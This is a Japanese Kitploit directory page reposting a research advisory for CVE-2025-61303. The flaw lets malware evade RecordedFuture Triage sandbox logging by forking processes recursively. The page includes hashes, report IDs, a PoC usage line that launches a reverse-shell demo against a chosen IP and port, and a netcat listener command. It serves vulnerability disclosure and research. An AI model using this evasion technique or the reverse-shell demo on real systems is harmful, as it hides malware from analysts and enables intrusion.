Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-61303 — 重大な脆弱性 (9.8) - RecordedFuture Triage 動的解析エンジンは、サンプルが非常に大量の再帰的プロセスフォークを生成する際に悪意のある動作の記録に失敗し、一貫性のない、または欠落した挙動レポートが発生する可能性があります。 | Kitploit
ツール/GitHubGitHub/egkritsis/cve-2025-61303
動的分析 (サンドボックス)脆弱性分析エクスプロイトマルウェア分析論文と研究学習と教育
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

重大な脆弱性 (9.8) - RecordedFuture Triage 動的解析エンジンは、サンプルが非常に大量の再帰的プロセスフォークを生成する際に悪意のある動作の記録に失敗し、一貫性のない、または欠落した挙動レポートが発生する可能性があります。

リポジトリを見る
249ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-61303 - RecordedFuture Triage: 再帰的プロセスフォークによる分析妨害(Denial-of-Analysis)

説明

RecordedFuture Triage Sandbox Windows 10 build 2004 および Windows 10 LTSC 2021 には、Windows ビヘイビア解析エンジンに 重大(critical) な脆弱性が存在し、提出されたマルウェアサンプルが検知を回避して**分析妨害(denial-of-analysis)**を引き起こす可能性があります。この脆弱性は、サンプルが大量の子プロセスを再帰的に生成し、ログ量が増大してシステムリソースを枯渇させた際に発現します。その結果、PowerShell の実行やリバースシェル活動などの主要な悪意ある挙動が記録または報告されず、アナリストを誤認させ、サンドボックス解析結果の整合性と可用性を損なう可能性があります。


CVSS スコア

CVSS v3.1: 9.8(Critical)
ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


著者 / 研究者

  • Evgenios Gkritsis — Department of Informatics, Athens University of Economics and Business, Greece
  • Constantinos Patsakis — Department of Informatics, University of Piraeus, Greece
  • George Stergiopoulos — Department of Informatics, Athens University of Economics and Business, Greece

詳細

サンプル vathos_rev.exe(SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b)は、RecordedFuture Triage の Windows ビヘイビア解析エンジンにおける**分析妨害(denial-of-analysis)**状態を示します。
Windows 10 構成で実行された場合、このサンプルは数千もの子プロセスを再帰的に生成し、プロセス追跡およびログ記録リソースを枯渇させます。その結果、サンドボックスは最小限のビヘイビアデータのみを報告し、主要な悪意ある動作の記録に失敗します。


Windows 10 v2004 環境

  • プラットフォーム: win10v2004-20250610-en
  • アーキテクチャ: x64
  • カーネル最大時間: 104s
  • ネットワーク最大時間: 213s
  • 報告されたビヘイビアスコア: 1/10
  • 検出されたシグネチャ: "Suspicious use of WriteProcessMemory"(64 IoCs)
  • 観察された挙動:
    • vathos_rev.exe の継続的なプロセス再帰
    • PowerShell の実行やリバースシェル活動は記録されず
    • 限定的なネットワークトラフィック(標準的な DNS および HTTP リクエストのみ)
    • C2 コールバックやペイロードテレメトリは取得されず

Windows 10 LTSC 2021 環境

  • プラットフォーム: win10ltsc2021-20250619-en
  • アーキテクチャ: x64
  • カーネル最大時間: 105s
  • ネットワーク最大時間: 215s
  • 報告されたビヘイビアスコア: 1/10
  • 検出されたシグネチャ: "Suspicious use of WriteProcessMemory"(64 IoCs)
  • 観察されたプロセス活動:
    • vathos_rev.exe の継続的なプロセス再帰
    • PowerShell の実行やリバースシェル活動は記録されず
    • 限定的なネットワークトラフィック(標準的な DNS および HTTP リクエストのみ)
    • C2 コールバックやペイロードテレメトリは取得されず

両方の Windows 10 サンドボックス環境において、マルウェアがホスト上でこれらの挙動を実行しているにもかかわらず、起動によって期待された PowerShell の実行およびリバースシェルの段階を捕捉できませんでした。

サンドボックスのビヘイビア解析エンジンは、再帰的なプロセス生成によって飽和状態となり、テレメトリが切り詰められる、または欠落しました。

これは**分析妨害(denial-of-analysis)**の脆弱性を裏付けるものであり、ビヘイビアエンジンが高い再帰性とログ量の条件下で悪意ある活動を報告できず、誤検知の見逃し(false negatives)と不完全なフォレンジック出力を引き起こします。

公開レポートの参照先:
https://tria.ge/250822-qfystshk51


影響

これは RecordedFuture Triage における**分析妨害(denial-of-analysis)**の脆弱性であり、動的解析エンジンがビヘイビア活動を捕捉または報告できない可能性があります。悪用されると、攻撃者はビヘイビア検知を回避し、不完全または欠落した分析レポートを生成できます。

主な影響

  • 検知回避: 悪意ある挙動が記録されず、脅威が無害に見える可能性があります。
  • 誤った信頼: テレメトリが欠落した低スコアの分析は、アナリストを誤認させる可能性があります。
  • 再利用可能な回避手法: この手法はローダー/ドロッパーに組み込まれ、キャンペーン全体で再利用される可能性があります。
  • 悪用の容易さ: 高度な専門知識なしに再現可能であり、広範な悪用のリスクを高めます。

下流への影響

  • IOC の見逃し
  • 高度な脅威の誤分類
  • 不完全なフォレンジックタイムライン

影響を受ける製品

  • 製品: RecordedFuture Triage(動的解析プラットフォーム)
  • 影響を受けるコンポーネント: Windows ビヘイビア解析エンジン
  • マルウェアサンプル: vathos_rev.exe
    • SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
    • MD5: dca2fc8f69f6493c7a9c1ce9a68b2454
    • SHA1: 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
    • SHA512: 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
    • サイズ: 270 KB

観察された脆弱な起動(公開 Triage レポート)

Windows 10 LTSC 2021 環境

  • レポート ID: 250822-qfystshk51
  • プラットフォーム: win10ltsc2021-20250619-en
  • アーキテクチャ: x64
  • 提出日時: 2025-08-22 13:12 UTC
  • 報告日時: 2025-08-22 13:18 UTC

Windows 10 Version 2004 環境

  • レポート ID: 250822-qfystshk51
  • プラットフォーム: win10v2004-20250610-en
  • アーキテクチャ: x64
  • 提出日時: 2025-08-22 13:12 UTC
  • 報告日時: 2025-08-22 13:18 UTC

注記: エンジンビルドおよび内部バージョンの詳細は、RecordedFuture によって公開されていません。
すべての観察結果は、RecordedFuture の Triage プラットフォーム(提出 250822-qfystshk51)における再現可能な公開起動に基づいています。


概念実証(PoC)

概要(簡潔)

提供されるデモは、非常に高いプロセス量と深くネストしたランタイム活動を生成することで、分析妨害(DoA)状態を再現します。このデモは多数の子プロセスを生成し、複数ラウンドの XOR 復号を実行した後、最終段階で PowerShell リバースシェルを実行します。脆弱な Triage Windows 10 イメージでは最終ペイロード段階が記録されないか切り詰められますが、他のイメージ(例: Windows 11)では完全な挙動が捕捉されます。

実行方法

root@kitploit:~
poc/vathos_demo.exe <IP> <PORT>

指定した IP/ポートでリスナー(例: nc -lvp 4444)を起動し、試行される接続を観察します。このデモは非常に多数のプロセスを生成し、複数ラウンドの XOR 復号を実行した後、PowerShell リバースシェルの段階に至ります。影響を受ける Triage 構成では、サンプルがホスト上で実行しているにもかかわらず、最終ペイロード段階が記録されない場合があります。

図 1 - Triage 概要ダッシュボード Figure 1 - Triage overview dashboard

図 2 - Windows 10 v2004 ビヘイビアレポート(最小テレメトリ / DoA 例) Figure 2 - win10 v2004 report (minimal telemetry)

図 3 - Windows 10 LTSC 2021 ビヘイビアレポート(最小テレメトリ / DoA 例) Figure 3 — win10 LTSC 2021 report (minimal telemetry)

図 4 - Windows 10 LTSC でログ記録されたプロセスの例(サニタイズ済み、すべてのプロセスが記録されているわけではない)— 解析ログ → プロセス Figure 4 - processes logged in win10 LTSC (sanitized)


参考文献

  • 公開 Triage 解析: https://tria.ge/250822-qfystshk51
  • https://www.cve.org/CVERecord?id=CVE-2025-61303

ツールをダウンロード